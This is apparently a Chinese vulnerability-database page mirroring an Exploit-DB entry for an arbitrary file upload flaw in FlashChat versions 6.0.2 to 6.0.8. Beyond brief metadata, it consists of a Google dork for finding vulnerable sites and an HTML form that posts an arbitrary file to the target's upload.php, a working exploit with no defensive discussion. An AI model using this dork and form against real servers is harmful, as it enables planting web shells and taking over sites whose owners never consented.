FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1065228 漏洞类型
发布时间 2013-10-04 更新时间 2013-10-04
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28709
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#######################################################	
# Exploit Title: FlashChat File Upload Vulnerability
# Google Dork: intitle:FlashChat v6.0.8
# Date: 02.10.2013
# Exploit Author: x-hayben21
# Vendor Homepage: www.punish3r.com
# Software Link: http://www.tufat.com/script2.htm
# Version: v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7,
# Tested on: Windows, PHP 5.2
#
# Special Thanks : MaXtoR - PoLoNia
#######################################################	

#Vulnerable File : upload.php

#Exploit
<form action="http://sites/script/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>